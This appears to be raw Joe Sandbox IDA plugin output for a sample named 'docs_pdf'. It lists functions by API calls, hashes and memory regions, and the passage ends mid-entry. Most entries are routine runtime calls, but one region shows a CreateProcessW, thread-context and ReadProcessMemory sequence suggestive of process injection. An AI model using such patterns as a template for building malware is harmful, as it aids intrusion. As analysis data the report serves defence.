                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                    • String ID:
                                    • API String ID: 1986988660-0
                                    • Opcode ID: f1c82adcce72e90e57865016d54d62beaeb45e5308c77f5d24a3276a4e9f11ed
                                    • Instruction ID: 066a2a6c47f2924878ed99c3c1d295a733891a4667b8a9e229dc9f19e868856b
                                    • Opcode Fuzzy Hash: f1c82adcce72e90e57865016d54d62beaeb45e5308c77f5d24a3276a4e9f11ed
                                    • Instruction Fuzzy Hash: 0981BBB0D01A418FE3A8EF3AE5556557BE6FB88304710812A90DBE724AEF3F5408DF55
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00FD5963
                                      • Part of subcall function 00FDA3AB: __NMSG_WRITE.LIBCMT ref: 00FDA3D2
                                      • Part of subcall function 00FDA3AB: __NMSG_WRITE.LIBCMT ref: 00FDA3DC
                                    • __NMSG_WRITE.LIBCMT ref: 00FD596A
                                      • Part of subcall function 00FDA408: GetModuleFileNameW.KERNEL32(00000000,010743BA,00000104,?,00000001,00000000), ref: 00FDA49A
                                      • Part of subcall function 00FDA408: ___crtMessageBoxW.LIBCMT ref: 00FDA548
                                      • Part of subcall function 00FD32DF: ___crtCorExitProcess.LIBCMT ref: 00FD32E5
                                      • Part of subcall function 00FD32DF: ExitProcess.KERNEL32 ref: 00FD32EE
                                      • Part of subcall function 00FD8D68: __getptd_noexit.LIBCMT ref: 00FD8D68
                                    • RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,00FD1013,?), ref: 00FD598F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: f2ca77ab3b57ca8b47acad2151e75dc5997e96b39a29eb3081f16f3605aea43d
                                    • Instruction ID: 66b185d393b7655c69d772052db3157831612f15da93934ef8e43941bceed0cb
                                    • Opcode Fuzzy Hash: f2ca77ab3b57ca8b47acad2151e75dc5997e96b39a29eb3081f16f3605aea43d
                                    • Instruction Fuzzy Hash: 3401D632A40616DED6212725EC6272D725B8F52B70F1C0027F500AB3C1DE799D01B766
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,010197D2,?,?,?,?,?,00000004), ref: 01019B45
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,010197D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 01019B5B
                                    • CloseHandle.KERNEL32(00000000,?,010197D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01019B62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: 40a2f379a7d0b73c7b6dcd19048f331f39128b7fd9758dca674b712df1e60dc3
                                    • Instruction ID: 627f2afa6e05091f15d17168e259319cd41af7ceb4a40a8b0d289a58053dd3e4
                                    • Opcode Fuzzy Hash: 40a2f379a7d0b73c7b6dcd19048f331f39128b7fd9758dca674b712df1e60dc3
                                    • Instruction Fuzzy Hash: ACE08632580315B7E7311A54EC09FDA7F5CAB06765F108210FB94690D0C7B625119799
                                    APIs
                                    • _free.LIBCMT ref: 01018FA5
                                      • Part of subcall function 00FD2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FD9C64), ref: 00FD2FA9
                                      • Part of subcall function 00FD2F95: GetLastError.KERNEL32(00000000,?,00FD9C64), ref: 00FD2FBB
                                    • _free.LIBCMT ref: 01018FB6
                                    • _free.LIBCMT ref: 01018FC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                    • Instruction ID: b37d92de93c8eef7bb9832b1a40e55e7fde4ebf7ee075e68276b772b77ee027d
                                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                    • Instruction Fuzzy Hash: 03E0C2A13087004ADAA4A63CAD00E872BEF0F4821070C0C4FB649DB24ACF2CE5409064
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: CALL
                                    • API String ID: 0-4196123274
                                    • Opcode ID: 15bdc051ca4f49b3ecc28e5489f1e66a68ecd639d856a41f294dc5daff8f1965
                                    • Instruction ID: 188ffbf30d07b65775f57537ba457f4fa23d6ae10ba1c48170b10d2086de84e2
                                    • Opcode Fuzzy Hash: 15bdc051ca4f49b3ecc28e5489f1e66a68ecd639d856a41f294dc5daff8f1965
                                    • Instruction Fuzzy Hash: A0226971908241DFC724DF15C894BAABBE1BF88310F14895DE8968B362DB75EC45EF82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID: EA06
                                    • API String ID: 4104443479-3962188686
                                    • Opcode ID: c6fb83b5fc2665f2292e9cd2df0282a405f87eb817b54438c791581100e5d6b2
                                    • Instruction ID: aab5e865a44408c8379f0582e58456c5445d2ab9a66fa3cee4a7294822dde850
                                    • Opcode Fuzzy Hash: c6fb83b5fc2665f2292e9cd2df0282a405f87eb817b54438c791581100e5d6b2
                                    • Instruction Fuzzy Hash: A6417D22E041546BDF219F668E517FE7FB6AB05310F284065F8829B283C629FD40BFA1
                                    APIs
                                    • IsThemeActive.UXTHEME ref: 00FB4992
                                      • Part of subcall function 00FD35AC: __lock.LIBCMT ref: 00FD35B2
                                      • Part of subcall function 00FD35AC: DecodePointer.KERNEL32(00000001,?,00FB49A7,010081BC), ref: 00FD35BE
                                      • Part of subcall function 00FD35AC: EncodePointer.KERNEL32(?,?,00FB49A7,010081BC), ref: 00FD35C9
                                      • Part of subcall function 00FB4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FB4A73
                                      • Part of subcall function 00FB4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FB4A88
                                      • Part of subcall function 00FB3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB3B7A
                                      • Part of subcall function 00FB3B4C: IsDebuggerPresent.KERNEL32 ref: 00FB3B8C
                                      • Part of subcall function 00FB3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,010762F8,010762E0,?,?), ref: 00FB3BFD
                                      • Part of subcall function 00FB3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00FB3C81
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FB49D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                    • String ID:
                                    • API String ID: 1438897964-0
                                    • Opcode ID: e50f38062eba2d5434dd91f8392dab1498ced5fb70bf0c94981d62a73e34cd56
                                    • Instruction ID: 0d24e69a134070d074b082d6354c03df1042782623d2eac44db1a95b1862fe09
                                    • Opcode Fuzzy Hash: e50f38062eba2d5434dd91f8392dab1498ced5fb70bf0c94981d62a73e34cd56
                                    • Instruction Fuzzy Hash: 9A11CD719087019BD320EF2AE80594AFBE8FF85710F00851EF185A32A2DBBA9545DF92
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00FB5981,?,?,?,?), ref: 00FB5E27
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00FB5981,?,?,?,?), ref: 00FEE19C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 0f3310e11a8a8f945dc31086a911246fc15a8a6ae3ad1c9f15011ba5c7ac90b3
                                    • Instruction ID: 51904807062f1134dd547e8a71d49415daaceae0b20ef61a2adb0191cbd4ac13
                                    • Opcode Fuzzy Hash: 0f3310e11a8a8f945dc31086a911246fc15a8a6ae3ad1c9f15011ba5c7ac90b3
                                    • Instruction Fuzzy Hash: E801F570640308BEF3250E25DC8AFB23B9CEB01B78F108308BAE56A1D0C7B95E45AF10
                                    APIs
                                      • Part of subcall function 00FD594C: __FF_MSGBANNER.LIBCMT ref: 00FD5963
                                      • Part of subcall function 00FD594C: __NMSG_WRITE.LIBCMT ref: 00FD596A
                                      • Part of subcall function 00FD594C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,00FD1013,?), ref: 00FD598F
                                    • std::exception::exception.LIBCMT ref: 00FD102C
                                    • __CxxThrowException@8.LIBCMT ref: 00FD1041
                                      • Part of subcall function 00FD87DB: RaiseException.KERNEL32(?,?,?,0106BAF8,00000000,?,?,?,?,00FD1046,?,0106BAF8,?,00000001), ref: 00FD8830
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 3902256705-0
                                    • Opcode ID: 8ae407e14e7a6cef1c78ea843b46b29df3fe6c12c00353ccec6ae57f0572c0dc
                                    • Instruction ID: 5758d25237dfe514c2b1046f193b3e376480644881baa39b458991aac9ba9c0a
                                    • Opcode Fuzzy Hash: 8ae407e14e7a6cef1c78ea843b46b29df3fe6c12c00353ccec6ae57f0572c0dc
                                    • Instruction Fuzzy Hash: 97F0F4B5600209B7CB24BA58FC05ADF7BAEAF00760F180027F844A6341DF758AC1A291
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: 77248548c86c54b4d34f732e8930608681697485fd43de8e441e743415d0c3da
                                    • Instruction ID: 0ae551bf1dff198d361b96e8f0feb8a0ad92171b0643558a103d132d8ec7ae01
                                    • Opcode Fuzzy Hash: 77248548c86c54b4d34f732e8930608681697485fd43de8e441e743415d0c3da
                                    • Instruction Fuzzy Hash: 07014871C40609EBCF11AF698C0659E7B63AF80760F1C4217F8245B361DB35C612FB51
                                    APIs
                                      • Part of subcall function 00FD8D68: __getptd_noexit.LIBCMT ref: 00FD8D68
                                    • __lock_file.LIBCMT ref: 00FD561B
                                      • Part of subcall function 00FD6E4E: __lock.LIBCMT ref: 00FD6E71
                                    • __fclose_nolock.LIBCMT ref: 00FD5626
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    • Opcode ID: 314c7ebdfb0cd5982ef3d556dc2612be6b2735c25161934ec7e40a1b19b83111
                                    • Instruction ID: a5d9fe88c894fa06cf99d6d2aa1cec84a561efc596bbddf40b75eebb207ab978
                                    • Opcode Fuzzy Hash: 314c7ebdfb0cd5982ef3d556dc2612be6b2735c25161934ec7e40a1b19b83111
                                    • Instruction Fuzzy Hash: 5EF09672900A059AD7216B798C0275E77A35F40B74F5D420BA464AB3C1CF7CC902BB55
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F81A5B
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F81AF1
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F81B13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                    • Instruction ID: cc4b6981838c7506d080724858367451ce51ab36be3a2e4bfd377e4c447993eb
                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                    • Instruction Fuzzy Hash: CE12DE24E18658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A5E77A4F81CB5A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 167d8358989cf1b4bd5810d68e5340966c2236654bad3477ad7a7e1df3c2db7a
                                    • Instruction ID: 82d3b328cf97a8e840ed26560edbb9af23b56f3ce5f6a5ea187d07e4cf2d669e
                                    • Opcode Fuzzy Hash: 167d8358989cf1b4bd5810d68e5340966c2236654bad3477ad7a7e1df3c2db7a
                                    • Instruction Fuzzy Hash: 05618A71A0020ADFDB20EF65C880BBBB7E5EF04310F188169E9069B291E775ED59EF50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07885c29da509da0d31f315673bbb548eb0347ca98db61cc639e9b53af7785d9
                                    • Instruction ID: 0374e772ec6502e2bb5d86e44b9c6ac5d70924437a00a5b4f8b3abea27898dfa
                                    • Opcode Fuzzy Hash: 07885c29da509da0d31f315673bbb548eb0347ca98db61cc639e9b53af7785d9
                                    • Instruction Fuzzy Hash: 34519F35600605ABCF14EB55CD92FAD77A6EF85720F188168F946AB392CF38ED04EB41
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 11c29b0f3fe12c11882c4c838d6bb1aca2612202df9aecf9aabe0f6fa49cd225
                                    • Instruction ID: c10ec855df883f44d28368c69df29b22b0b93d218c974346f0d6443dc1c2ac0c
                                    • Opcode Fuzzy Hash: 11c29b0f3fe12c11882c4c838d6bb1aca2612202df9aecf9aabe0f6fa49cd225
                                    • Instruction Fuzzy Hash: 4C318779608B02DFC724AF1AD490A61F7A1FF48320B24C56EE959CB755EB30D881EF94
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00FB5CF6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 76c0e5b6f4b5e624eda1180d7867f83ceeb67bdc216f270a5230b6fc6cc2b8b0
                                    • Instruction ID: 06c95c9e4ecbfc76f43bb28767a83db4f3128874dc419e2f9dfe029216511201
                                    • Opcode Fuzzy Hash: 76c0e5b6f4b5e624eda1180d7867f83ceeb67bdc216f270a5230b6fc6cc2b8b0
                                    • Instruction Fuzzy Hash: E5315E71A00B0AABCB18CF6AC48479DB7B6FF48720F148619D81993750D775B950EF90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: ba6025c0e788d4d6589e84661d50de6a0c93268fe1696994596ae85fb482e408
                                    • Instruction ID: 72310485c9287d9091670b0a93698618a0afff6c04565efadddbaead903d947f
                                    • Opcode Fuzzy Hash: ba6025c0e788d4d6589e84661d50de6a0c93268fe1696994596ae85fb482e408
                                    • Instruction Fuzzy Hash: B4413474908341CFDB24DF15C488B5ABBE1BF49318F09889CE9894B362C776E845DF52
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                    • Instruction ID: 231ce873eae8a8550a2f204a995687cfba2d0b60a6840146e2a9fcd19f583253
                                    • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                    • Instruction Fuzzy Hash: A311E432609205AFC714EF19C881DAEB7ADEF85360724851AE915DB3A0DB36EC11EB90
                                    APIs
                                      • Part of subcall function 00FB4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00FB4D4D
                                      • Part of subcall function 00FD548B: __wfsopen.LIBCMT ref: 00FD5496
                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FB4F6F
                                      • Part of subcall function 00FB4CC8: FreeLibrary.KERNEL32(00000000), ref: 00FB4D02
                                      • Part of subcall function 00FB4DD0: _memmove.LIBCMT ref: 00FB4E1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load__wfsopen_memmove
                                    • String ID:
                                    • API String ID: 1396898556-0
                                    • Opcode ID: 7e92c118be2e6a23e5f169b4e2250dabe43b329be9404780b96d2c4a77214406
                                    • Instruction ID: 7c435b83fde01cdcd8fb9bddac2ac462ddc3aae6420aeea1d16d152b30ec353a
                                    • Opcode Fuzzy Hash: 7e92c118be2e6a23e5f169b4e2250dabe43b329be9404780b96d2c4a77214406
                                    • Instruction Fuzzy Hash: A211EB31A00206AACF14FF72CD12FEE77A99F44B10F108429F54197182DA796A05BFA1
                                    Memory Dump Source
